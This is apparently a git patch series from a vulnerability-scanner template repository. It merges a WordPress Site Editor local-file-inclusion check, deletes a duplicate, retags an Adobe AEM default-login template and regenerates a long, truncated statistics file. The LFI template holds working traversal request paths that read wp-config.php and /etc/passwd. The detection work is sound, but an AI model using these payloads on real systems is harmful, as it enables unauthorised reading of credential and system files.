a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml index 0662aac51c..6aa32d6c87 100644 --- a/cves/2018/CVE-2018-7422.yaml +++ b/cves/2018/CVE-2018-7422.yaml @@ -2,7 +2,7 @@ id: CVE-2018-7422 info: name: WordPress Site Editor Plugin LFI - author: LuskaBol + author: LuskaBol,0x240x23elu severity: high tags: cve,cve2018,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. @@ -12,8 +12,9 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php' + - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - matchers-condition: and + matchers-condition: or matchers: - type: word words: @@ -22,6 +23,7 @@ requests: part: body condition: and - - type: status - status: - - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body \ No newline at end of file diff --git a/vulnerabilities/wordpress/wp-site-editor-lfi.yaml b/vulnerabilities/wordpress/wp-site-editor-lfi.yaml deleted file mode 100644 index d71b084130..0000000000 --- a/vulnerabilities/wordpress/wp-site-editor-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-site-editor-lfi - -info: - name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/44340 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body \ No newline at end of file From b98b89b42f910581f94b0619e05a133335412bb5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 01:15:15 +0530 Subject: [PATCH 108/149] Tags update --- default-logins/aem/adobe-aem-default-credentials.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 254903e532..30b1006bc0 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -4,9 +4,7 @@ info: name: Adobe AEM Default Credentials author: random-robbie severity: critical - tags: aem,default-login - reference: - + tags: aem,default-login,fuzz requests: - payloads: From c999ea6f62940ad2fd9323256c6c5bf3b838c8c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 20:15:35 +0000 Subject: [PATCH 109/149] Auto Generated Templates Stats [Mon Jul 19 20:15:35 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1145 +++++++++++++++++++++--------------------- 2 files changed, 573 insertions(+), 574 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index ad6fd08d99..e29c8178d0 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"debug","count":13},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"cve2012","count":9},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"dlink","count":9},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"php","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"api","count":6},{"name":"google","count":6},{"name":"xxe","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"rails","count":6},{"name":"backup","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"lucee","count":5},{"name":"circarlife","count":5},{"name":"jetty","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"login","count":5},{"name":"drupal","count":5},{"name":"ruijie","count":5},{"name":"phpmyadmin","count":5},{"name":"confluence","count":5},{"name":"laravel","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"router","count":4},{"name":"magmi","count":4},{"name":"netgear","count":4},{"name":"artifactory","count":4},{"name":"jolokia","count":4},{"name":"django","count":4},{"name":"cve2009","count":4},{"name":"thinkcmf","count":4},{"name":"ibm","count":4},{"name":"docker","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"fileupload","count":4},{"name":"elastic","count":4},{"name":"vpn","count":4},{"name":"nodejs","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"amazon","count":3},{"name":"backups","count":3},{"name":"dedecms","count":3},{"name":"springcloud","count":3},{"name":"git","count":3},{"name":"log","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"crlf","count":3},{"name":"slack","count":3},{"name":"openssh","count":3},{"name":"nosqli","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"terramaster","count":3},{"name":"deserialization","count":3},{"name":"nacos","count":3},{"name":"microstrategy","count":3},{"name":"mongodb","count":3},{"name":"kubernetes","count":3},{"name":"printer","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"windows","count":3},{"name":"lfr","count":3},{"name":"oa","count":3},{"name":"kafka","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"grafana","count":3},{"name":"ebs","count":3},{"name":"ofbiz","count":3},{"name":"splunk","count":2},{"name":"nextjs","count":2},{"name":"natshell","count":2},{"name":"openfire","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"kentico","count":2},{"name":"telerik","count":2},{"name":"httpd","count":2},{"name":"wordfence","count":2},{"name":"service","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"chamilo","count":2},{"name":"hp","count":2},{"name":"sharepoint","count":2},{"name":"waf","count":2},{"name":"bitrix","count":2},{"name":"huawei","count":2},{"name":"intrusive","count":2},{"name":"activemq","count":2},{"name":"rockmongo","count":2},{"name":"microsoft","count":2},{"name":"zhiyuan","count":2},{"name":"sonicwall","count":2},{"name":"icewarp","count":2},{"name":"seeyon","count":2},{"name":"saltstack","count":2},{"name":"trixbox","count":2},{"name":"ucmdb","count":2},{"name":"spark","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"coldfusion","count":2},{"name":"hashicorp","count":2},{"name":"globalprotect","count":2},{"name":"shellshock","count":2},{"name":"prometheus","count":2},{"name":"kibana","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"xxljob","count":2},{"name":"nexus","count":2},{"name":"emerge","count":2},{"name":"couchdb","count":2},{"name":"leak","count":2},{"name":"ecology","count":2},{"name":"zabbix","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"webcam","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"showdoc","count":2},{"name":"glassfish","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"mida","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"injection","count":2},{"name":"rockethchat","count":2},{"name":"odoo","count":2},{"name":"smtp","count":2},{"name":"proxy","count":2},{"name":"vrealize","count":2},{"name":"oauth","count":2},{"name":"bigip","count":2},{"name":"frp","count":2},{"name":"pega","count":2},{"name":"flir","count":2},{"name":"maian","count":2},{"name":"paloalto","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"nagios","count":2},{"name":"exposures","count":2},{"name":"smb","count":2},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"bolt","count":1},{"name":"postgres","count":1},{"name":"dom","count":1},{"name":"timeclock","count":1},{"name":"redis","count":1},{"name":"grav","count":1},{"name":"redhat","count":1},{"name":"anchorcms","count":1},{"name":"rdp","count":1},{"name":"sarg","count":1},{"name":"springframework","count":1},{"name":"spectracom","count":1},{"name":"visionhub","count":1},{"name":"enum","count":1},{"name":"tongda","count":1},{"name":"harbor","count":1},{"name":"horde","count":1},{"name":"lotuscms","count":1},{"name":"symfony","count":1},{"name":"ambari","count":1},{"name":"plone","count":1},{"name":"centos","count":1},{"name":"apiman","count":1},{"name":"socomec","count":1},{"name":"fortinet","count":1},{"name":"zcms","count":1},{"name":"salesforce","count":1},{"name":"darkstat","count":1},{"name":"enumeration","count":1},{"name":"jsp","count":1},{"name":"ueditor","count":1},{"name":"mantisbt","count":1},{"name":"nedi","count":1},{"name":"openerp","count":1},{"name":"mailchimp","count":1},{"name":"etouch","count":1},{"name":"dlogin","count":1},{"name":"redwood","count":1},{"name":"linksys","count":1},{"name":"fuelcms","count":1},{"name":"jitsi","count":1},{"name":"xdcms","count":1},{"name":"fortilogger","count":1},{"name":"landray","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"wamp","count":1},{"name":"setup","count":1},{"name":"mediumish","count":1},{"name":"acexy","count":1},{"name":"opensns","count":1},{"name":"targa","count":1},{"name":"cve2005","count":1},{"name":"swagger","count":1},{"name":"cors","count":1},{"name":"zmanda","count":1},{"name":"mirai","count":1},{"name":"finereport","count":1},{"name":"zookeeper","count":1},{"name":"blind","count":1},{"name":"tenda","count":1},{"name":"pgadmin","count":1},{"name":"akamai","count":1},{"name":"mautic","count":1},{"name":"traefik","count":1},{"name":"octobercms","count":1},{"name":"fastapi","count":1},{"name":"kubeflow","count":1},{"name":"javafaces","count":1},{"name":"ssl","count":1},{"name":"svn","count":1},{"name":"episerver","count":1},{"name":"axis","count":1},{"name":"dotnetnuke","count":1},{"name":"bookstack","count":1},{"name":"thinkadmin","count":1},{"name":"cve2007","count":1},{"name":"node","count":1},{"name":"pacsone","count":1},{"name":"netis","count":1},{"name":"powercreator","count":1},{"name":"itop","count":1},{"name":"wp-theme","count":1},{"name":"b2evolution","count":1},{"name":"glances","count":1},{"name":"klog","count":1},{"name":"upload","count":1},{"name":"rujjie","count":1},{"name":"arl","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"webui","count":1},{"name":"expn","count":1},{"name":"blackboard","count":1},{"name":"nette","count":1},{"name":"drone","count":1},{"name":"szhe","count":1},{"name":"biometrics","count":1},{"name":"shopware","count":1},{"name":"ulterius","count":1},{"name":"rsyncd","count":1},{"name":"eyou","count":1},{"name":"extractor","count":1},{"name":"keenetic","count":1},{"name":"phpunit","count":1},{"name":"k8s","count":1},{"name":"jmx","count":1},{"name":"calendarix","count":1},{"name":"linkedin","count":1},{"name":"rubedo","count":1},{"name":"ems","count":1},{"name":"ntopng","count":1},{"name":"netsweeper","count":1},{"name":"bitly","count":1},{"name":"rabbitmq","count":1},{"name":"openrestry","count":1},{"name":"revision","count":1},{"name":"geddy","count":1},{"name":"yachtcontrol","count":1},{"name":"jsf","count":1},{"name":"cobub","count":1},{"name":"skywalking","count":1},{"name":"wuzhicms","count":1},{"name":"payara","count":1},{"name":"heroku","count":1},{"name":"tensorboard","count":1},{"name":"blue-ocean","count":1},{"name":"ioncube","count":1},{"name":"wiki","count":1},{"name":"ganglia","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"faraday","count":1},{"name":"tensorflow","count":1},{"name":"viewpoint","count":1},{"name":"mcafee","count":1},{"name":"emby","count":1},{"name":"bash","count":1},{"name":"bruteforce","count":1},{"name":"diris","count":1},{"name":"webmodule-ee","count":1},{"name":"db","count":1},{"name":"opencast","count":1},{"name":"feifeicms","count":1},{"name":"ecom","count":1},{"name":"tileserver","count":1},{"name":"zeroshell","count":1},{"name":"soar","count":1},{"name":"domxss","count":1},{"name":"discord","count":1},{"name":"bullwark","count":1},{"name":"nsasg","count":1},{"name":"druid","count":1},{"name":"codeigniter","count":1},{"name":"uwsgi","count":1},{"name":"acme","count":1},{"name":"beanshell","count":1},{"name":"hortonworks","count":1},{"name":"empirecms","count":1},{"name":"stem","count":1},{"name":"rhymix","count":1},{"name":"jeewms","count":1},{"name":"mpsec","count":1},{"name":"woocomernce","count":1},{"name":"xunchi","count":1},{"name":"adminer","count":1},{"name":"nc2","count":1},{"name":"flash","count":1},{"name":"subrion","count":1},{"name":"goahead","count":1},{"name":"kyan","count":1},{"name":"crm","count":1},{"name":"shopxo","count":1},{"name":"cloudflare","count":1},{"name":"igs","count":1},{"name":"primetek","count":1},{"name":"gloo","count":1},{"name":"cve2010","count":1},{"name":"monitorix","count":1},{"name":"nomad","count":1},{"name":"wooyun","count":1},{"name":"sitecore","count":1},{"name":"circontrorl","count":1},{"name":"selea","count":1},{"name":"panos","count":1},{"name":"parentlink","count":1},{"name":"lanproxy","count":1},{"name":"kerbynet","count":1},{"name":"nuuo","count":1},{"name":"sqlite","count":1},{"name":"rfi","count":1},{"name":"seacms","count":1},{"name":"javamelody","count":1},{"name":"aspnuke","count":1},{"name":"xml","count":1},{"name":"avtech","count":1},{"name":"myucms","count":1},{"name":"viewlinc","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"doh","count":1},{"name":"azure","count":1},{"name":"spidercontrol","count":1},{"name":"scs","count":1},{"name":"memcached","count":1},{"name":"totaljs","count":1},{"name":"phalcon","count":1},{"name":"majordomo2","count":1},{"name":"sidekiq","count":1},{"name":"fortigates","count":1},{"name":"wmt","count":1},{"name":"fortiweb","count":1},{"name":"dvwa","count":1},{"name":"dompdf","count":1},{"name":"zarafa","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"vscode","count":1},{"name":"zm","count":1},{"name":"pyramid","count":1},{"name":"phpinfo","count":1},{"name":"panabit","count":1},{"name":"wso2","count":1},{"name":"circontrol","count":1},{"name":"floc","count":1},{"name":"tamronos","count":1},{"name":"zend","count":1},{"name":"haproxy","count":1},{"name":"jfrog","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"csrf","count":1},{"name":"zimbra","count":1},{"name":"svnserve","count":1},{"name":"sentry","count":1},{"name":"hadoop","count":1},{"name":"webadmin","count":1},{"name":"ec2","count":1},{"name":"alibaba","count":1},{"name":"appweb","count":1},{"name":"nuxeo","count":1},{"name":"krweb","count":1},{"name":"ssltls","count":1},{"name":"liferay","count":1},{"name":"email","count":1},{"name":"wazuh","count":1},{"name":"landrayoa","count":1},{"name":"fedora","count":1},{"name":"plastic","count":1},{"name":"checkpoint","count":1},{"name":"clave","count":1},{"name":"jquery","count":1},{"name":"maccmsv10","count":1},{"name":"gateone","count":1},{"name":"synnefo","count":1},{"name":"weiphp","count":1},{"name":"upnp","count":1},{"name":"st","count":1},{"name":"gridx","count":1},{"name":"servicedesk","count":1},{"name":"saltapi","count":1},{"name":"trilithic","count":1},{"name":"aura","count":1},{"name":"fastcgi","count":1},{"name":"csod","count":1},{"name":"labtech","count":1},{"name":"concrete","count":1},{"name":"status","count":1},{"name":"tika","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"grails","count":1},{"name":"mdb","count":1},{"name":"vsphere","count":1},{"name":"pulsesecure","count":1},{"name":"vsftpd","count":1},{"name":"netrc","count":1},{"name":"wifisky","count":1},{"name":"74cms","count":1},{"name":"dotnet","count":1},{"name":"backdoor","count":1},{"name":"fiori","count":1},{"name":"lansweeper","count":1},{"name":"chinaunicom","count":1},{"name":"exchange","count":1},{"name":"duomicms","count":1},{"name":"firebase","count":1},{"name":"realteo","count":1},{"name":"opensmtpd","count":1},{"name":"rmc","count":1},{"name":"sprintful","count":1},{"name":"xiuno","count":1},{"name":"tapestry","count":1},{"name":"livezilla","count":1},{"name":"spring","count":1},{"name":"openstack","count":1},{"name":"k8","count":1},{"name":"gitlist","count":1},{"name":"codemeter","count":1},{"name":"idemia","count":1},{"name":"mysql","count":1},{"name":"jenkin","count":1},{"name":"portainer","count":1},{"name":"plc","count":1},{"name":"spf","count":1},{"name":"sco","count":1},{"name":"octoprint","count":1},{"name":"oscommerce","count":1},{"name":"optiLink","count":1},{"name":"netdata","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"opm","count":1},{"name":"zenario","count":1},{"name":"kafdrop","count":1},{"name":"gogs","count":1},{"name":"emc","count":1},{"name":"alertmanager","count":1},{"name":"cocoon","count":1},{"name":"pippoint","count":1},{"name":"nordex","count":1},{"name":"timesheet","count":1},{"name":"mara","count":1},{"name":"alerta","count":1},{"name":"2014","count":1},{"name":"erp-nc","count":1},{"name":"kong","count":1},{"name":"nexusdb","count":1},{"name":"ns","count":1},{"name":"dvr","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"linkerd","count":1},{"name":"npm","count":1},{"name":"embedthis","count":1},{"name":"fortigate","count":1},{"name":"servicenow","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"proftpd","count":1},{"name":"triconsole","count":1},{"name":"comodo","count":1},{"name":"webmin","count":1},{"name":"cloudinary","count":1},{"name":"metinfo","count":1},{"name":"geutebruck","count":1},{"name":"clockwatch","count":1},{"name":"discourse","count":1},{"name":"mongo","count":1},{"name":"nps","count":1},{"name":"wavemaker","count":1},{"name":"htmli","count":1},{"name":"cgi","count":1},{"name":"zte","count":1},{"name":"varnish","count":1},{"name":"xff","count":1},{"name":"razor","count":1},{"name":"opentsdb","count":1},{"name":"ilo4","count":1},{"name":"clusterengine","count":1},{"name":"jenzabar","count":1},{"name":"postmessage","count":1},{"name":"flink","count":1},{"name":"moinmoin","count":1},{"name":"node-red-dashboard","count":1},{"name":"favicon","count":1},{"name":"zzzcms","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"wdahlenb","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"melbadry9","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"caspergn","count":5},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"tess","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"binaryfigments","count":3},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"swissky","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"lu4nx","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"0xrudra","count":2},{"name":"0xsapra","count":2},{"name":"shifacyclewala","count":2},{"name":"incogbyte","count":2},{"name":"elsfa7110","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xelkomy","count":2},{"name":"udit_thakkur","count":2},{"name":"ehsahil","count":2},{"name":"unstabl3","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"random-robbie","count":2},{"name":"gevakun","count":2},{"name":"zomsop82","count":2},{"name":"ree4pwn","count":2},{"name":"jarijaas","count":2},{"name":"foulenzer","count":2},{"name":"moritz nentwig","count":2},{"name":"0xcrypto","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mavericknerd","count":2},{"name":"amsda","count":2},{"name":"streetofhackerr007","count":1},{"name":"_generic_human_","count":1},{"name":"mah3sec_","count":1},{"name":"wabafet","count":1},{"name":"c3l3si4n","count":1},{"name":"abison_binoy","count":1},{"name":"elmahdi","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"alex","count":1},{"name":"daviey","count":1},{"name":"yavolo","count":1},{"name":"micha3lb3n","count":1},{"name":"notsoevilweasel","count":1},{"name":"dudez","count":1},{"name":"koti2","count":1},{"name":"hakluke","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"juicypotato1","count":1},{"name":"thezakman","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"fopina","count":1},{"name":"nytr0gen","count":1},{"name":"w4cky_","count":1},{"name":"thevillagehacker","count":1},{"name":"mubassirpatel","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"berkdusunur","count":1},{"name":"ringo","count":1},{"name":"bjhulst","count":1},{"name":"b4uh0lz","count":1},{"name":"kareemse1im","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kurohost","count":1},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"omarkurt","count":1},{"name":"0h1in9e","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manuelbua","count":1},{"name":"cookiehanhoan","count":1},{"name":"mhdsamx","count":1},{"name":"rojanrijal","count":1},{"name":"furkansenan","count":1},{"name":"blckraven","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"vsh00t","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"52971","count":1},{"name":"gal nagli","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"th3.d1p4k","count":1},{"name":"_harleo","count":1},{"name":"becivells","count":1},{"name":"shifacyclewla","count":1},{"name":"flag007","count":1},{"name":"patralos","count":1},{"name":"ilovebinbash","count":1},{"name":"r3naissance","count":1},{"name":"sullo","count":1},{"name":"chron0x","count":1},{"name":"@dwisiswant0","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"sickwell","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"hanlaomo","count":1},{"name":"jeya seelan","count":1},{"name":"fabaff","count":1},{"name":"zandros0","count":1},{"name":"apt-mirror","count":1},{"name":"taielab","count":1},{"name":"yashgoti","count":1},{"name":"remonsec","count":1},{"name":"bing0o","count":1},{"name":"tirtha_mandal","count":1},{"name":"divya_mudgal","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ajaysenr","count":1},{"name":"sshell","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"its0x08","count":1},{"name":"schniggie","count":1},{"name":"alifathi-h1","count":1},{"name":"pudsec","count":1},{"name":"nkxxkn","count":1},{"name":"pdp","count":1},{"name":"kabirsuda","count":1},{"name":"shreyapohekar","count":1},{"name":"mohammedsaneem","count":1},{"name":"dawid czarnecki","count":1},{"name":"raesene","count":1},{"name":"0ut0fb4nd","count":1},{"name":"smaranchand","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"exploitation","count":1},{"name":"_darrenmartyn","count":1},{"name":"zhenwarx","count":1},{"name":"alperenkesk","count":1},{"name":"0xtavian","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"akshansh","count":1},{"name":"gboddin","count":1},{"name":"affix","count":1},{"name":"rtcms","count":1},{"name":"toufik airane","count":1},{"name":"sicksec","count":1},{"name":"ldionmarcil","count":1},{"name":"arcc","count":1},{"name":"idealphase","count":1},{"name":"naglinagli","count":1},{"name":"johnjhacking","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"andirrahmani1","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"dogasantos","count":1},{"name":"bolli95","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"vzamanillo","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"deena","count":1},{"name":"s1r1u5_","count":1},{"name":"bad5ect0r","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"johnk3r","count":1}],"directory":[{"name":"cves","count":468},{"name":"vulnerabilities","count":234},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"logs","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"cisco","count":15},{"name":"listing","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"php","count":8},{"name":"cve2013","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"confluence","count":5},{"name":"headless","count":5},{"name":"laravel","count":5},{"name":"phpmyadmin","count":5},{"nam